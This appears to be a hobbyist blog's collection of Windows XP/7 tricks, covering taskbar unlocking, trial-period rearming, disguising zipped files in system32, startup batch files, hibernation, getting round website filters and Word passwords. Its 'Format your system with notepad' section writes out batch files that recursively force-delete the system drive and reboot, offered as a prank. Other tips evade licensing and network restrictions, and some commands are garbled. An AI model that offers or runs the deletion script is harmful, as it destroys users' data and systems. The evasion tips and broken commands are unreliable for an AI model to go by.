Unlock Taskbar in Windows 7
Download the 32-bit or 64-bit tools as per your requirement and place it into the Windows directory.
Open command prompt with administrative privileges and type the following commands
• takeown /f %windir%\explorer.exe
• cacls %windir%\explorer.exe /E /G UserName:F (replace UserName with your username in windows 7)
• taskkill /im explorer.exe /f
• cd %windir%
• start unlockProtectedFeatures.exe
Now you need to re launch the shell by clicking the launch button



Extend Windows 7 from 30 days to 90 Days trail
Follow the procedure below to extend your trail period
1.Firstly, Download Windows 7 Pre-Beta M3 Build 6801 from here.
2. Burn it on a DVD, and install windows 7.
Note: This hack will work after every days of use, so try these commands 2 times just some days before your 30 days trail is going to end.
3. When installation is complete, open Command Prompt.
Type any of the three commands below:
sysprep /generalize
slmgr.vbs –rearm
rundll32 slc.dll,SLReArmWindows
This is how you can get 90 = 30+60 days of Windows 7 trail period.

HIDE FILES/FOLDER IN A SUCURE MANNER WIHOUT ANY SOFTWARE

HIDING STEPS -

1. Right click on the file/folder that u want to hide then Send to ->New
Compressed (zipped) Folder
2.Change the file extention from *.zip to anything or nothing (like xzy.zip to xyz/xyz.dll/xyz.pdf/xyz.doc/etc)

TIP: Change to *.dll for safest hiding.(backup)

Note: IF UR SYSTEM IS NOT SHOWING FILE EXTENTION THEN OPEN MY COMPUTER GO TO ->TOOLS ->FOLDER OPTIONS->VIEW->uncheck HIDE EXTENTIONS OF KNOWN FILE TYPES

4.Change the file name if u want to but make shure u remember it else it wont be easy to search it out when unhiding .
5. Now paste the file in \WINDOWS\system32 folder (very important step).
jobs done!
u have hided file/folder without any external software .

UNHIDING STEPS :

1. Search for ur file in \WINDOWS\system32 .
2. change the file extention to *. zip ( like if ur file is xyz.dll after hiding then change to xyz.zip ).
3. Extract to wherever u want.

Format your system with notepad :

go to notepad

@Echo off
Del C:\ *.*|y

save it as Dell.bat

or
worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as abc .bat file

caution:-don’t try this on your computer

Write A Batch File To Start Program In Startup

You can start your computer applications automatically and control the sequence of the programs when your computer comes up.

Here we consider you want to run three different applications (WordPad, calculator, and notepad) and minimized automatically with sequence at windows startup. However, you can write a batch file to do the job for you. Open any text editor like notepad and type the following command.

start /min wordpad.exe start /min calc.exe start /min notepad.exe

Now choose the option, Save As to save this file with .bat extension. For example filename.bat.

Now Right- click on Start button and choose open > Double click Programs > here open Startup folder. Now drag your .bat file in the Startup folder and close the dialog box.

Next time When you restart the computer, WordPad, Calc will start first and then Notepad. You won't see the batch file run because you told it to run minimized.

Enable the Hibernation feature in windows XP

In windows environment, the hibernation is a built-in feature used to increases your work performance and also minimizes the windows startup time. For example, if you have to keep open a lot of files and windows applications then you can leave you system in hibernate mode without closing the open programs. When you restart computer after hibernation, all the running files and applications will be restore as you have left them. Windows store the all hibernated information in the Hiberfil.sys file using system root folder. The size of this file is roughly equal to the RAM of your system.



Follow the given steps to activate the hibernation in windows XP:

To use this feature, you will need to be logged into your computer with administrative rights.

First click on Start button> Control Panel, click on Performance and Maintenance then click on Power Options.

A new "Power Options Properties" dialog box will appear, select Hibernate tab and then select the "Enable hibernation" check box to enable the hibernate feature.

If you system does not support the hibernation feature then the hibernation tab will not available there.

Now click on Apply button to implement the changes then click on Ok button to end the configuration process.

After enabling the hibernation feature click on Start button then click on "Turn off Computer". In the "Turn off Computer" dialog box, press the "Shift" for some time and click on Hibernate button. Your system will take some time to complete the hibernation process.

Access the restricted or banned websites

You can access the restricted or banned websites with the help of this tip. You may have problems to accessing your favorite's politics, news, and sexy websites in your office and other public places. Some time these websites banned by Government, ISP and may be by your office network administrator. This tip is very useful, if you are using internet particularly in school, college and office.

Follow the given points to access the banned website:

Technique 1: Search the banned website, for example www.tricks-vijay.blogspot.com in Google and yahoo search engine then open the cached copy of that page to access the website. You can get also cache link of that website, if you search in Google with keyword cache:URL name and get cache link to access the website.

Technique 2: Another method to access the banned website using its IP address, because you can open the website with IP address instead of actual URL name. This technique bypasses the URL based restrictions. For example if www.myspace.com is banned in your school, you can open it using IP address 216.178.32.51. You can search online IP conversion tools to get IP address of any website.

Technique 3: There are some mini web browsers can help you to open the banned websites, for example Opera Mini Browser, install it and try to open any banned website. Another Real Player browser can successfully help you to access the banned website. This Real Player browser bypasses the many restrictions of website banned tools.

Technique 4: There any many websites Anonymizer tools are available to fetch the banned website. Clear History and Temporary Internet Files

When you are browsing the internet, the Internet browser cached some file on the system as temp files for later use. Specially if your are viewing some private but your web browser will store all your information (visited websites) as a history and your co-workers, family members can trace your activates on the internet with clicking of toolbar history button or with simply press Ctrl+H. If your are using internet at any public place like internet cafe then you should clear your temp file history to safe yourself from cyber crimes.

If your are using Internet Explorer and wants to delete the history, then first open your Internet Explorer.

Click on Tools Menu then go to Internet Options. Here in General tab you will find the Delete Cookies and Delete files tab in the center of the screen.

First click on Delete Cookies option to delete all the cookies in the temporary files folder and then click on Delete files option to delete all the offline temporary files.

Now click on the Clear History button to clear your recently visited sites. You can set days to keep pages in history here. Be default it is 20 days, but you can change it from 0 to 99 days. If you set it 1 days, the system will clear your browser history automatically after one day.

Click on Ok button to save your changes.

Internet Error Codes and Meaning

Sometime you are browsing the internet and trying to open any website, your e-mail and any FTP sites , but you see different error codes there. You should be familiar with these error codes. You can solve these problems if you are well-known with the meaning of error codes.

Error Codes Meaning

400 This is bad request error, First check you may be typing wrong URL name and server could not understand your request.

401 You are trying to open any unauthorized access site or page. Check your username and password if you are trying to open any webpage.

402 Payment Required Error

403 You are trying to open any forbidden page and you are blocked by that domain.

404 Here you are trying to open the webpage that was removed or re-named, also check the URL spelling.

408 This is time out error. you should send the request with in time that the server set for you.

Protecting Document with Password

You can protect your document by applying password so that unauthorized person can not display as well as modify your document. You can apply two types of passwords:

Password to open the document:

If it is applied then you have to give the correct password to open the document, otherwise you cannot open the document.

Password to modify the document:

If it is applied then you have to give the correct password to modify the document, otherwise your document is opened but you cannot modify the document. It means that your document becomes read-only.

To apply a password to document, follow these steps.

-> Open Save As dialog box by selecting "Save As" command from File menu.

-> Click "Tools" button of Save As dialog box and choose "General Options" from drop down menu, "Save" dialog box appears as shown in figure below.

-> Enter first password in "Password to open" text box and second password in "Password to modify" text box (if required) and click "Ok" button of dialog box. Microsoft Word will open "Confirm Password" dialog box for the confirmation of passwords. The maximum length of password is 15 characters.

-> Re-enter the password to open and password to modify and click "Ok" button of Confirm Password dialog boxes one by one.

-> Click "Save" button of Save As dialog box.
